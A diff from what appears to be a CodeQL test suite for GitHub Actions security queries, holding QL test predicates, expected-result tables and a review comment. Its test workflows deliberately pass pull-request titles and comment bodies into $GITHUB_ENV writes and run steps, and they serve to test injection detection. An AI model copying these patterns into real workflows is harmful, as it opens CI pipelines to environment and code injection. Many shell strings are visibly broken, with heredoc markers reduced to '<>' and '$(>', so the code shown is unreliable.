"$GITHUB_ENV", content, _) + blockFileWrite(t, _, "$GITHUB_ENV", content, _) + //extractFileWrite(t, "GITHUB_ENV", content) ) } -query predicate writeToGitHubOutput(string key, string value) { +query predicate writeToGitHubEnv(string key, string value, string content) { exists(string t | t = [ - "echo \"::set-output name=id1::$(> $GITHUB_OUTPUT", - "echo 'sha2=$(> $GITHUB_OUTPUT", - "echo sha3=$(> $GITHUB_OUTPUT", - "echo sha4=$(> \"$GITHUB_OUTPUT\"", - "echo sha5=$(> ${GITHUB_OUTPUT}", - "echo sha6=$(> \"${GITHUB_OUTPUT}\"", + // block + "{\n echo 'VAR0<> \"$GITHUB_ENV\"\n", + "{\necho 'VAR1<> \"$GITHUB_ENV\"", + "{\necho 'VAR2<> \"$GITHUB_ENV\"", + "FOO\n{\n echo 'VAR22<> \"$GITHUB_ENV\"\nBAR", + // multiline + "FOO\necho \"VAR3<> $GITHUB_ENV\necho \"$TITLE\" >> $GITHUB_ENV\necho \"EOF\" >> $GITHUB_ENV\nBAR", + "echo \"PACKAGES_FILE_LIST<> \"${GITHUB_ENV}\"\nls | grep -E \"*.(tar.gz|zip)$\" >> \"${GITHUB_ENV}\"\nls | grep -E \"*.(txt|md)$\" >> \"${GITHUB_ENV}\"\necho 
\"EOF\" >> \"${GITHUB_ENV}\"", + // heredoc 1 + "cat >> $GITHUB_ENV << EOL\nVAR4=${ISSUE_BODY1}\nEOL", + "cat > $GITHUB_ENV << EOL\nVAR5<> $GITHUB_ENV\nVAR6=${ISSUE_BODY3}\nEOL\n", + "cat < $GITHUB_ENV\nVAR7<> \"$GITHUB_ENV\"\nVAR8=$(echo \"FOO\")\nVAR9<> $GITHUB_ENV", + "echo 'VAR14=$(> $GITHUB_ENV", + "echo VAR15=$(> $GITHUB_ENV", + "echo VAR16=$(cat issue.txt | sed 's/\\r/\\n/g' | grep -ioE '\\s*[a-z0-9_-]+/[a-z0-9_-]+\\s*$' | tr -d ' ') >> $GITHUB_ENV", ] and - extractLineAssignment(t, "OUTPUT", key, value) + extractFileWrite(t, "GITHUB_ENV", content) and + extractVariableAndValue(content, key, value) + ) +} + +query predicate writeToGitHubOutput(string key, string value, string content) { + exists(string t | + t = + [ + "echo \"::set-output name=VAR1::$(> $GITHUB_OUTPUT", + "echo 'VAR5=$(> $GITHUB_OUTPUT", + "echo VAR6=$(> $GITHUB_OUTPUT", + "echo VAR7=$(> \"$GITHUB_OUTPUT\"", + "echo VAR8=$(> ${GITHUB_OUTPUT}", + "echo VAR9=$(> \"${GITHUB_OUTPUT}\"", + ] and + extractFileWrite(t, "GITHUB_OUTPUT", content) and + extractVariableAndValue(content, key, value) + ) +} + +query predicate isBashParameterExpansion(string parameter, string operator, string params) { + exists(string test | + test = + [ + "$parameter1", "${parameter2}", "${!parameter3}", "${#parameter4}", "${parameter5:-value}", + "${parameter6:=value}", "${parameter7:+value}", "${parameter8:?value}", + "${parameter9:=default value}", "${parameter10##*/}", "${parameter11/#pattern/string}", + "${parameter12/%pattern/string}", "${parameter13,pattern}", "${parameter14,,pattern}", + "${parameter15^pattern}", "${parameter16^^pattern}", "${parameter17:start}", + "${parameter18#pattern}", "${parameter19##pattern}", "${parameter20%pattern}", + "${parameter21%%pattern}", "${parameter22/pattern/string}", + "${parameter23//pattern/string}", + ] and + isBashParameterExpansion(test, parameter, operator, params) ) } 
diff --git a/ql/test/query-tests/Security/CWE-020/.github/workflows/reusable_workflow.yml b/ql/test/query-tests/Security/CWE-020/.github/workflows/reusable_workflow.yml index 0ca7ecdfbde..c2e9e17160d 100644 --- a/ql/test/query-tests/Security/CWE-020/.github/workflows/reusable_workflow.yml +++ b/ql/test/query-tests/Security/CWE-020/.github/workflows/reusable_workflow.yml @@ -27,7 +27,7 @@ jobs: CONFIG_PATH: ${{ inputs.config-path }} run: | echo ${{ inputs.config-path }} - echo "::set-output name=step-output:: $CONFIG_PATH" + echo "::set-output name=step-output::$CONFIG_PATH" - name: Get changed files id: step2 uses: tj-actions/changed-files@v40 diff --git a/ql/test/query-tests/Security/CWE-077/.github/workflows/test4.yml b/ql/test/query-tests/Security/CWE-077/.github/workflows/test4.yml index 154a8135bad..7b30ec8b7e4 100644 --- a/ql/test/query-tests/Security/CWE-077/.github/workflows/test4.yml +++ b/ql/test/query-tests/Security/CWE-077/.github/workflows/test4.yml @@ -36,14 +36,14 @@ jobs: run: | { echo 'JSON_RESPONSE<> "$GITHUB_ENV" + echo "$TITLE" echo EOF } >> "$GITHUB_ENV" - env: TITLE: ${{ github.event.pull_request.title }} run: | cat <<-EOF >> "$GITHUB_ENV" - echo "FOO=$TITLE" + FOO=$TITLE EOF - env: TITLE: ${{ github.event.pull_request.head.ref }} @@ -55,6 +55,17 @@ jobs: - run: echo "BRANCH=$(echo ${TARGET_BRANCH##*/})" >> $GITHUB_ENV env: TARGET_BRANCH: ${{ github.event.pull_request.title }} + - run: echo ISSUE_KEY=$(echo "${TITLE}" | grep -oP 'ISPN-(?P[0-9]+)') >> $GITHUB_ENV + env: + TITLE: ${{ github.event.pull_request.title }} + - env: + TITLE: |- + ${{ github.event.pull_request.title }} + run: | + cat > issue.txt << EOL + ${TITLE} + EOL + echo REPO_NAME=$(cat issue.txt | sed 's/\r/\n/g' | grep -ioE '\s*[a-z0-9_-]+/[a-z0-9_-]+\s*$' | tr -d ' ') >> $GITHUB_ENV diff --git a/ql/test/query-tests/Security/CWE-077/EnvVarInjectionCritical.expected b/ql/test/query-tests/Security/CWE-077/EnvVarInjectionCritical.expected index 369085708a0..ffaaf91e550 100644 
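Review bot: The two steps added at the end of the `@@ -55,6 +55,17 @@` hunk of test4.yml carry no comment saying whether the query is meant to flag them, and the expected files changed in this commit gain rows only for the first. The `ISSUE_KEY` step passes `${TITLE}` through `grep -oP` with an `ISPN-` plus digits pattern before the write to `$GITHUB_ENV`, so the written value looks constrained, yet `EnvVarInjectionCritical.expected` records it as a finding. The `issue.txt` / `REPO_NAME` step, where the title reaches `$GITHUB_ENV` by way of a file, gets no row in the expected hunks visible here, which reads as an undetected case. I would add a line above each step stating the intent, for example `# flagged: the grep filter is not modelled as a sanitizer` and `# not flagged yet: flow through issue.txt is not tracked`, worded to match what is actually intended, and regenerate the `.expected` files since the added lines shift the recorded locations. The job these steps belong to starts outside the hunk.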
--- a/ql/test/query-tests/Security/CWE-077/EnvVarInjectionCritical.expected +++ b/ql/test/query-tests/Security/CWE-077/EnvVarInjectionCritical.expected 
@@ -6,9 +6,10 @@ edges | .github/workflows/test4.yml:19:19:19:56 | github.event.pull_request.title | .github/workflows/test4.yml:20:14:21:54 | echo PR_TITLE=$(echo $TITLE) >> $GITHUB_ENV\n | | .github/workflows/test4.yml:23:19:23:56 | github.event.pull_request.title | .github/workflows/test4.yml:24:14:27:36 | echo "PR_TITLE<> $GITHUB_ENV\necho "$TITLE" >> $GITHUB_ENV\necho "EOF" >> $GITHUB_ENV\n | | .github/workflows/test4.yml:29:19:29:56 | github.event.pull_request.title | .github/workflows/test4.yml:30:14:33:40 | echo "PACKAGES_FILE_LIST<> "${GITHUB_ENV}"\necho "$TITLE" >> "${GITHUB_ENV}"\necho "EOF" >> "${GITHUB_ENV}"\n | -| .github/workflows/test4.yml:35:19:35:56 | github.event.pull_request.title | .github/workflows/test4.yml:36:14:41:29 | {\n echo 'JSON_RESPONSE<> "$GITHUB_ENV"\n echo EOF\n} >> "$GITHUB_ENV"\n | -| .github/workflows/test4.yml:43:19:43:56 | github.event.pull_request.title | .github/workflows/test4.yml:44:14:47:14 | cat <<-EOF >> "$GITHUB_ENV"\n echo "FOO=$TITLE"\nEOF\n | +| .github/workflows/test4.yml:35:19:35:56 | github.event.pull_request.title | .github/workflows/test4.yml:36:14:41:29 | {\n echo 'JSON_RESPONSE<> "$GITHUB_ENV"\n | +| .github/workflows/test4.yml:43:19:43:56 | github.event.pull_request.title | .github/workflows/test4.yml:44:14:47:14 | cat <<-EOF >> "$GITHUB_ENV"\nFOO=$TITLE\nEOF\n | | .github/workflows/test4.yml:57:27:57:64 | github.event.pull_request.title | .github/workflows/test4.yml:55:14:55:70 | echo "BRANCH=$(echo ${TARGET_BRANCH##*/})" >> $GITHUB_ENV | +| .github/workflows/test4.yml:60:19:60:56 | github.event.pull_request.title | .github/workflows/test4.yml:58:14:58:94 | echo ISSUE_KEY=$(echo "${TITLE}" \| grep -oP 'ISPN-(?P[0-9]+)') >> $GITHUB_ENV | | .github/workflows/test5.yml:10:9:30:6 | Uses Step | .github/workflows/test5.yml:33:14:36:62 | echo "PR_NUM=$(cat coverage/pr_num.txt)" >> $GITHUB_ENV\necho "BASE=$(cat coverage/base.txt)" >> $GITHUB_ENV\necho "HEAD=$(cat coverage/head.txt)" >> $GITHUB_ENV\n | nodes | 
.github/workflows/test2.yml:12:9:41:6 | Uses Step | semmle.label | Uses Step | 
@@ -26,11 +27,13 @@ nodes | .github/workflows/test4.yml:29:19:29:56 | github.event.pull_request.title | semmle.label | github.event.pull_request.title | | .github/workflows/test4.yml:30:14:33:40 | echo "PACKAGES_FILE_LIST<> "${GITHUB_ENV}"\necho "$TITLE" >> "${GITHUB_ENV}"\necho "EOF" >> "${GITHUB_ENV}"\n | semmle.label | echo "PACKAGES_FILE_LIST<> "${GITHUB_ENV}"\necho "$TITLE" >> "${GITHUB_ENV}"\necho "EOF" >> "${GITHUB_ENV}"\n | | .github/workflows/test4.yml:35:19:35:56 | github.event.pull_request.title | semmle.label | github.event.pull_request.title | -| .github/workflows/test4.yml:36:14:41:29 | {\n echo 'JSON_RESPONSE<> "$GITHUB_ENV"\n echo EOF\n} >> "$GITHUB_ENV"\n | semmle.label | {\n echo 'JSON_RESPONSE<> "$GITHUB_ENV"\n echo EOF\n} >> "$GITHUB_ENV"\n | +| .github/workflows/test4.yml:36:14:41:29 | {\n echo 'JSON_RESPONSE<> "$GITHUB_ENV"\n | semmle.label | {\n echo 'JSON_RESPONSE<> "$GITHUB_ENV"\n | | .github/workflows/test4.yml:43:19:43:56 | github.event.pull_request.title | semmle.label | github.event.pull_request.title | -| .github/workflows/test4.yml:44:14:47:14 | cat <<-EOF >> "$GITHUB_ENV"\n echo "FOO=$TITLE"\nEOF\n | semmle.label | cat <<-EOF >> "$GITHUB_ENV"\n echo "FOO=$TITLE"\nEOF\n | +| .github/workflows/test4.yml:44:14:47:14 | cat <<-EOF >> "$GITHUB_ENV"\nFOO=$TITLE\nEOF\n | semmle.label | cat <<-EOF >> "$GITHUB_ENV"\nFOO=$TITLE\nEOF\n | | .github/workflows/test4.yml:55:14:55:70 | echo "BRANCH=$(echo ${TARGET_BRANCH##*/})" >> $GITHUB_ENV | semmle.label | echo "BRANCH=$(echo ${TARGET_BRANCH##*/})" >> $GITHUB_ENV | | .github/workflows/test4.yml:57:27:57:64 | github.event.pull_request.title | semmle.label | github.event.pull_request.title | +| .github/workflows/test4.yml:58:14:58:94 | echo ISSUE_KEY=$(echo "${TITLE}" \| grep -oP 'ISPN-(?P[0-9]+)') >> $GITHUB_ENV | semmle.label | echo ISSUE_KEY=$(echo "${TITLE}" \| grep -oP 'ISPN-(?P[0-9]+)') >> $GITHUB_ENV | +| .github/workflows/test4.yml:60:19:60:56 | github.event.pull_request.title | semmle.label 
| github.event.pull_request.title | | .github/workflows/test5.yml:10:9:30:6 | Uses Step | semmle.label | Uses Step | | .github/workflows/test5.yml:33:14:36:62 | echo "PR_NUM=$(cat coverage/pr_num.txt)" >> $GITHUB_ENV\necho "BASE=$(cat coverage/base.txt)" >> $GITHUB_ENV\necho "HEAD=$(cat coverage/head.txt)" >> $GITHUB_ENV\n | semmle.label | echo "PR_NUM=$(cat coverage/pr_num.txt)" >> $GITHUB_ENV\necho "BASE=$(cat coverage/base.txt)" >> $GITHUB_ENV\necho "HEAD=$(cat coverage/head.txt)" >> $GITHUB_ENV\n | subpaths 
@@ -42,7 +45,8 @@ subpaths | .github/workflows/test4.yml:20:14:21:54 | echo PR_TITLE=$(echo $TITLE) >> $GITHUB_ENV\n | .github/workflows/test4.yml:19:19:19:56 | github.event.pull_request.title | .github/workflows/test4.yml:20:14:21:54 | echo PR_TITLE=$(echo $TITLE) >> $GITHUB_ENV\n | Potential environment variable injection in $@, which may be controlled by an external user. | .github/workflows/test4.yml:20:14:21:54 | echo PR_TITLE=$(echo $TITLE) >> $GITHUB_ENV\n | echo PR_TITLE=$(echo $TITLE) >> $GITHUB_ENV\n | | .github/workflows/test4.yml:24:14:27:36 | echo "PR_TITLE<> $GITHUB_ENV\necho "$TITLE" >> $GITHUB_ENV\necho "EOF" >> $GITHUB_ENV\n | .github/workflows/test4.yml:23:19:23:56 | github.event.pull_request.title | .github/workflows/test4.yml:24:14:27:36 | echo "PR_TITLE<> $GITHUB_ENV\necho "$TITLE" >> $GITHUB_ENV\necho "EOF" >> $GITHUB_ENV\n | Potential environment variable injection in $@, which may be controlled by an external user. | .github/workflows/test4.yml:24:14:27:36 | echo "PR_TITLE<> $GITHUB_ENV\necho "$TITLE" >> $GITHUB_ENV\necho "EOF" >> $GITHUB_ENV\n | echo "PR_TITLE<> $GITHUB_ENV\necho "$TITLE" >> $GITHUB_ENV\necho "EOF" >> $GITHUB_ENV\n | | .github/workflows/test4.yml:30:14:33:40 | echo "PACKAGES_FILE_LIST<> "${GITHUB_ENV}"\necho "$TITLE" >> "${GITHUB_ENV}"\necho "EOF" >> "${GITHUB_ENV}"\n | .github/workflows/test4.yml:29:19:29:56 | github.event.pull_request.title | .github/workflows/test4.yml:30:14:33:40 | echo "PACKAGES_FILE_LIST<> "${GITHUB_ENV}"\necho "$TITLE" >> "${GITHUB_ENV}"\necho "EOF" >> "${GITHUB_ENV}"\n | Potential environment variable injection in $@, which may be controlled by an external user. 
| .github/workflows/test4.yml:30:14:33:40 | echo "PACKAGES_FILE_LIST<> "${GITHUB_ENV}"\necho "$TITLE" >> "${GITHUB_ENV}"\necho "EOF" >> "${GITHUB_ENV}"\n | echo "PACKAGES_FILE_LIST<> "${GITHUB_ENV}"\necho "$TITLE" >> "${GITHUB_ENV}"\necho "EOF" >> "${GITHUB_ENV}"\n | -| .github/workflows/test4.yml:36:14:41:29 | {\n echo 'JSON_RESPONSE<> "$GITHUB_ENV"\n echo EOF\n} >> "$GITHUB_ENV"\n | .github/workflows/test4.yml:35:19:35:56 | github.event.pull_request.title | .github/workflows/test4.yml:36:14:41:29 | {\n echo 'JSON_RESPONSE<> "$GITHUB_ENV"\n echo EOF\n} >> "$GITHUB_ENV"\n | Potential environment variable injection in $@, which may be controlled by an external user. | .github/workflows/test4.yml:36:14:41:29 | {\n echo 'JSON_RESPONSE<> "$GITHUB_ENV"\n echo EOF\n} >> "$GITHUB_ENV"\n | {\n echo 'JSON_RESPONSE<> "$GITHUB_ENV"\n echo EOF\n} >> "$GITHUB_ENV"\n | -| .github/workflows/test4.yml:44:14:47:14 | cat <<-EOF >> "$GITHUB_ENV"\n echo "FOO=$TITLE"\nEOF\n | .github/workflows/test4.yml:43:19:43:56 | github.event.pull_request.title | .github/workflows/test4.yml:44:14:47:14 | cat <<-EOF >> "$GITHUB_ENV"\n echo "FOO=$TITLE"\nEOF\n | Potential environment variable injection in $@, which may be controlled by an external user. | .github/workflows/test4.yml:44:14:47:14 | cat <<-EOF >> "$GITHUB_ENV"\n echo "FOO=$TITLE"\nEOF\n | cat <<-EOF >> "$GITHUB_ENV"\n echo "FOO=$TITLE"\nEOF\n | +| .github/workflows/test4.yml:36:14:41:29 | {\n echo 'JSON_RESPONSE<> "$GITHUB_ENV"\n | .github/workflows/test4.yml:35:19:35:56 | github.event.pull_request.title | .github/workflows/test4.yml:36:14:41:29 | {\n echo 'JSON_RESPONSE<> "$GITHUB_ENV"\n | Potential environment variable injection in $@, which may be controlled by an external user. 
| .github/workflows/test4.yml:36:14:41:29 | {\n echo 'JSON_RESPONSE<> "$GITHUB_ENV"\n | {\n echo 'JSON_RESPONSE<> "$GITHUB_ENV"\n | +| .github/workflows/test4.yml:44:14:47:14 | cat <<-EOF >> "$GITHUB_ENV"\nFOO=$TITLE\nEOF\n | .github/workflows/test4.yml:43:19:43:56 | github.event.pull_request.title | .github/workflows/test4.yml:44:14:47:14 | cat <<-EOF >> "$GITHUB_ENV"\nFOO=$TITLE\nEOF\n | Potential environment variable injection in $@, which may be controlled by an external user. | .github/workflows/test4.yml:44:14:47:14 | cat <<-EOF >> "$GITHUB_ENV"\nFOO=$TITLE\nEOF\n | cat <<-EOF >> "$GITHUB_ENV"\nFOO=$TITLE\nEOF\n | | .github/workflows/test4.yml:55:14:55:70 | echo "BRANCH=$(echo ${TARGET_BRANCH##*/})" >> $GITHUB_ENV | .github/workflows/test4.yml:57:27:57:64 | github.event.pull_request.title | .github/workflows/test4.yml:55:14:55:70 | echo "BRANCH=$(echo ${TARGET_BRANCH##*/})" >> $GITHUB_ENV | Potential environment variable injection in $@, which may be controlled by an external user. | .github/workflows/test4.yml:55:14:55:70 | echo "BRANCH=$(echo ${TARGET_BRANCH##*/})" >> $GITHUB_ENV | echo "BRANCH=$(echo ${TARGET_BRANCH##*/})" >> $GITHUB_ENV | +| .github/workflows/test4.yml:58:14:58:94 | echo ISSUE_KEY=$(echo "${TITLE}" \| grep -oP 'ISPN-(?P[0-9]+)') >> $GITHUB_ENV | .github/workflows/test4.yml:60:19:60:56 | github.event.pull_request.title | .github/workflows/test4.yml:58:14:58:94 | echo ISSUE_KEY=$(echo "${TITLE}" \| grep -oP 'ISPN-(?P[0-9]+)') >> $GITHUB_ENV | Potential environment variable injection in $@, which may be controlled by an external user. 
| .github/workflows/test4.yml:58:14:58:94 | echo ISSUE_KEY=$(echo "${TITLE}" \| grep -oP 'ISPN-(?P[0-9]+)') >> $GITHUB_ENV | echo ISSUE_KEY=$(echo "${TITLE}" \| grep -oP 'ISPN-(?P[0-9]+)') >> $GITHUB_ENV | | .github/workflows/test5.yml:33:14:36:62 | echo "PR_NUM=$(cat coverage/pr_num.txt)" >> $GITHUB_ENV\necho "BASE=$(cat coverage/base.txt)" >> $GITHUB_ENV\necho "HEAD=$(cat coverage/head.txt)" >> $GITHUB_ENV\n | .github/workflows/test5.yml:10:9:30:6 | Uses Step | .github/workflows/test5.yml:33:14:36:62 | echo "PR_NUM=$(cat coverage/pr_num.txt)" >> $GITHUB_ENV\necho "BASE=$(cat coverage/base.txt)" >> $GITHUB_ENV\necho "HEAD=$(cat coverage/head.txt)" >> $GITHUB_ENV\n | Potential environment variable injection in $@, which may be controlled by an external user. | .github/workflows/test5.yml:33:14:36:62 | echo "PR_NUM=$(cat coverage/pr_num.txt)" >> $GITHUB_ENV\necho "BASE=$(cat coverage/base.txt)" >> $GITHUB_ENV\necho "HEAD=$(cat coverage/head.txt)" >> $GITHUB_ENV\n | echo "PR_NUM=$(cat coverage/pr_num.txt)" >> $GITHUB_ENV\necho "BASE=$(cat coverage/base.txt)" >> $GITHUB_ENV\necho "HEAD=$(cat coverage/head.txt)" >> $GITHUB_ENV\n | diff --git a/ql/test/query-tests/Security/CWE-077/EnvVarInjectionMedium.expected b/ql/test/query-tests/Security/CWE-077/EnvVarInjectionMedium.expected index 241a33146b8..28fffe0e5e4 100644 --- a/ql/test/query-tests/Security/CWE-077/EnvVarInjectionMedium.expected +++ b/ql/test/query-tests/Security/CWE-077/EnvVarInjectionMedium.expected 
@@ -6,9 +6,10 @@ edges | .github/workflows/test4.yml:19:19:19:56 | github.event.pull_request.title | .github/workflows/test4.yml:20:14:21:54 | echo PR_TITLE=$(echo $TITLE) >> $GITHUB_ENV\n | | .github/workflows/test4.yml:23:19:23:56 | github.event.pull_request.title | .github/workflows/test4.yml:24:14:27:36 | echo "PR_TITLE<> $GITHUB_ENV\necho "$TITLE" >> $GITHUB_ENV\necho "EOF" >> $GITHUB_ENV\n | | .github/workflows/test4.yml:29:19:29:56 | github.event.pull_request.title | .github/workflows/test4.yml:30:14:33:40 | echo "PACKAGES_FILE_LIST<> "${GITHUB_ENV}"\necho "$TITLE" >> "${GITHUB_ENV}"\necho "EOF" >> "${GITHUB_ENV}"\n | -| .github/workflows/test4.yml:35:19:35:56 | github.event.pull_request.title | .github/workflows/test4.yml:36:14:41:29 | {\n echo 'JSON_RESPONSE<> "$GITHUB_ENV"\n echo EOF\n} >> "$GITHUB_ENV"\n | -| .github/workflows/test4.yml:43:19:43:56 | github.event.pull_request.title | .github/workflows/test4.yml:44:14:47:14 | cat <<-EOF >> "$GITHUB_ENV"\n echo "FOO=$TITLE"\nEOF\n | +| .github/workflows/test4.yml:35:19:35:56 | github.event.pull_request.title | .github/workflows/test4.yml:36:14:41:29 | {\n echo 'JSON_RESPONSE<> "$GITHUB_ENV"\n | +| .github/workflows/test4.yml:43:19:43:56 | github.event.pull_request.title | .github/workflows/test4.yml:44:14:47:14 | cat <<-EOF >> "$GITHUB_ENV"\nFOO=$TITLE\nEOF\n | | .github/workflows/test4.yml:57:27:57:64 | github.event.pull_request.title | .github/workflows/test4.yml:55:14:55:70 | echo "BRANCH=$(echo ${TARGET_BRANCH##*/})" >> $GITHUB_ENV | +| .github/workflows/test4.yml:60:19:60:56 | github.event.pull_request.title | .github/workflows/test4.yml:58:14:58:94 | echo ISSUE_KEY=$(echo "${TITLE}" \| grep -oP 'ISPN-(?P[0-9]+)') >> $GITHUB_ENV | | .github/workflows/test5.yml:10:9:30:6 | Uses Step | .github/workflows/test5.yml:33:14:36:62 | echo "PR_NUM=$(cat coverage/pr_num.txt)" >> $GITHUB_ENV\necho "BASE=$(cat coverage/base.txt)" >> $GITHUB_ENV\necho "HEAD=$(cat coverage/head.txt)" >> $GITHUB_ENV\n | nodes | 
.github/workflows/test2.yml:12:9:41:6 | Uses Step | semmle.label | Uses Step | 
@@ -26,11 +27,13 @@ nodes | .github/workflows/test4.yml:29:19:29:56 | github.event.pull_request.title | semmle.label | github.event.pull_request.title | | .github/workflows/test4.yml:30:14:33:40 | echo "PACKAGES_FILE_LIST<> "${GITHUB_ENV}"\necho "$TITLE" >> "${GITHUB_ENV}"\necho "EOF" >> "${GITHUB_ENV}"\n | semmle.label | echo "PACKAGES_FILE_LIST<> "${GITHUB_ENV}"\necho "$TITLE" >> "${GITHUB_ENV}"\necho "EOF" >> "${GITHUB_ENV}"\n | | .github/workflows/test4.yml:35:19:35:56 | github.event.pull_request.title | semmle.label | github.event.pull_request.title | -| .github/workflows/test4.yml:36:14:41:29 | {\n echo 'JSON_RESPONSE<> "$GITHUB_ENV"\n echo EOF\n} >> "$GITHUB_ENV"\n | semmle.label | {\n echo 'JSON_RESPONSE<> "$GITHUB_ENV"\n echo EOF\n} >> "$GITHUB_ENV"\n | +| .github/workflows/test4.yml:36:14:41:29 | {\n echo 'JSON_RESPONSE<> "$GITHUB_ENV"\n | semmle.label | {\n echo 'JSON_RESPONSE<> "$GITHUB_ENV"\n | | .github/workflows/test4.yml:43:19:43:56 | github.event.pull_request.title | semmle.label | github.event.pull_request.title | -| .github/workflows/test4.yml:44:14:47:14 | cat <<-EOF >> "$GITHUB_ENV"\n echo "FOO=$TITLE"\nEOF\n | semmle.label | cat <<-EOF >> "$GITHUB_ENV"\n echo "FOO=$TITLE"\nEOF\n | +| .github/workflows/test4.yml:44:14:47:14 | cat <<-EOF >> "$GITHUB_ENV"\nFOO=$TITLE\nEOF\n | semmle.label | cat <<-EOF >> "$GITHUB_ENV"\nFOO=$TITLE\nEOF\n | | .github/workflows/test4.yml:55:14:55:70 | echo "BRANCH=$(echo ${TARGET_BRANCH##*/})" >> $GITHUB_ENV | semmle.label | echo "BRANCH=$(echo ${TARGET_BRANCH##*/})" >> $GITHUB_ENV | | .github/workflows/test4.yml:57:27:57:64 | github.event.pull_request.title | semmle.label | github.event.pull_request.title | +| .github/workflows/test4.yml:58:14:58:94 | echo ISSUE_KEY=$(echo "${TITLE}" \| grep -oP 'ISPN-(?P[0-9]+)') >> $GITHUB_ENV | semmle.label | echo ISSUE_KEY=$(echo "${TITLE}" \| grep -oP 'ISPN-(?P[0-9]+)') >> $GITHUB_ENV | +| .github/workflows/test4.yml:60:19:60:56 | github.event.pull_request.title | semmle.label 
| github.event.pull_request.title | | .github/workflows/test5.yml:10:9:30:6 | Uses Step | semmle.label | Uses Step | | .github/workflows/test5.yml:33:14:36:62 | echo "PR_NUM=$(cat coverage/pr_num.txt)" >> $GITHUB_ENV\necho "BASE=$(cat coverage/base.txt)" >> $GITHUB_ENV\necho "HEAD=$(cat coverage/head.txt)" >> $GITHUB_ENV\n | semmle.label | echo "PR_NUM=$(cat coverage/pr_num.txt)" >> $GITHUB_ENV\necho "BASE=$(cat coverage/base.txt)" >> $GITHUB_ENV\necho "HEAD=$(cat coverage/head.txt)" >> $GITHUB_ENV\n | subpaths diff --git a/ql/test/query-tests/Security/CWE-094/.github/workflows/test5.yml b/ql/test/query-tests/Security/CWE-094/.github/workflows/test5.yml new file mode 100644 index 00000000000..b9b861bd060 --- /dev/null +++ b/ql/test/query-tests/Security/CWE-094/.github/workflows/test5.yml @@ -0,0 +1,13 @@ +name: Test +on: + issue_comment: + +permissions: + contents: write + +jobs: + test: + runs-on: ubuntu-latest + steps: + - run: echo '${{ toJSON(github.event.comment.body).foo }}' + diff --git a/ql/test/query-tests/Security/CWE-094/CodeInjectionCritical.expected b/ql/test/query-tests/Security/CWE-094/CodeInjectionCritical.expected index ac4761deda1..48412116363 100644 --- a/ql/test/query-tests/Security/CWE-094/CodeInjectionCritical.expected +++ b/ql/test/query-tests/Security/CWE-094/CodeInjectionCritical.expected 
@@ -234,6 +234,7 @@ nodes | .github/workflows/test4.yml:15:21:15:55 | toJSON(github.event.comment) | semmle.label | toJSON(github.event.comment) | | .github/workflows/test4.yml:19:21:19:53 | toJSON(github.event.issue) | semmle.label | toJSON(github.event.issue) | | .github/workflows/test4.yml:27:21:27:47 | toJSON(github.event) | semmle.label | toJSON(github.event) | +| .github/workflows/test5.yml:12:21:12:64 | toJSON(github.event.comment.body).foo | semmle.label | toJSON(github.event.comment.body).foo | | .github/workflows/test.yml:8:7:10:4 | Job outputs node [job_output] | semmle.label | Job outputs node [job_output] | | .github/workflows/test.yml:8:20:8:50 | steps.step5.outputs.MSG5 | semmle.label | steps.step5.outputs.MSG5 | | .github/workflows/test.yml:12:9:18:6 | Uses Step: step0 [value] | semmle.label | Uses Step: step0 [value] | 
@@ -330,6 +331,7 @@ subpaths | .github/workflows/test4.yml:15:21:15:55 | toJSON(github.event.comment) | .github/workflows/test4.yml:15:21:15:55 | toJSON(github.event.comment) | .github/workflows/test4.yml:15:21:15:55 | toJSON(github.event.comment) | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/test4.yml:15:21:15:55 | toJSON(github.event.comment) | ${{ toJSON(github.event.comment) }} | | .github/workflows/test4.yml:19:21:19:53 | toJSON(github.event.issue) | .github/workflows/test4.yml:19:21:19:53 | toJSON(github.event.issue) | .github/workflows/test4.yml:19:21:19:53 | toJSON(github.event.issue) | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/test4.yml:19:21:19:53 | toJSON(github.event.issue) | ${{ toJSON(github.event.issue) }} | | .github/workflows/test4.yml:27:21:27:47 | toJSON(github.event) | .github/workflows/test4.yml:27:21:27:47 | toJSON(github.event) | .github/workflows/test4.yml:27:21:27:47 | toJSON(github.event) | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/test4.yml:27:21:27:47 | toJSON(github.event) | ${{ toJSON(github.event) }} | +| .github/workflows/test5.yml:12:21:12:64 | toJSON(github.event.comment.body).foo | .github/workflows/test5.yml:12:21:12:64 | toJSON(github.event.comment.body).foo | .github/workflows/test5.yml:12:21:12:64 | toJSON(github.event.comment.body).foo | Potential code injection in $@, which may be controlled by an external user. 
| .github/workflows/test5.yml:12:21:12:64 | toJSON(github.event.comment.body).foo | ${{ toJSON(github.event.comment.body).foo }} | | .github/workflows/workflow_run.yml:9:19:9:64 | github.event.workflow_run.display_title | .github/workflows/workflow_run.yml:9:19:9:64 | github.event.workflow_run.display_title | .github/workflows/workflow_run.yml:9:19:9:64 | github.event.workflow_run.display_title | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/workflow_run.yml:9:19:9:64 | github.event.workflow_run.display_title | ${{ github.event.workflow_run.display_title }} | | .github/workflows/workflow_run.yml:10:19:10:70 | github.event.workflow_run.head_commit.message | .github/workflows/workflow_run.yml:10:19:10:70 | github.event.workflow_run.head_commit.message | .github/workflows/workflow_run.yml:10:19:10:70 | github.event.workflow_run.head_commit.message | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/workflow_run.yml:10:19:10:70 | github.event.workflow_run.head_commit.message | ${{ github.event.workflow_run.head_commit.message }} | | .github/workflows/workflow_run.yml:11:19:11:75 | github.event.workflow_run.head_commit.author.email | .github/workflows/workflow_run.yml:11:19:11:75 | github.event.workflow_run.head_commit.author.email | .github/workflows/workflow_run.yml:11:19:11:75 | github.event.workflow_run.head_commit.author.email | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/workflow_run.yml:11:19:11:75 | github.event.workflow_run.head_commit.author.email | ${{ github.event.workflow_run.head_commit.author.email }} | diff --git a/ql/test/query-tests/Security/CWE-094/CodeInjectionMedium.expected b/ql/test/query-tests/Security/CWE-094/CodeInjectionMedium.expected index c69af0316bf..d577e2fd732 100644 --- a/ql/test/query-tests/Security/CWE-094/CodeInjectionMedium.expected 
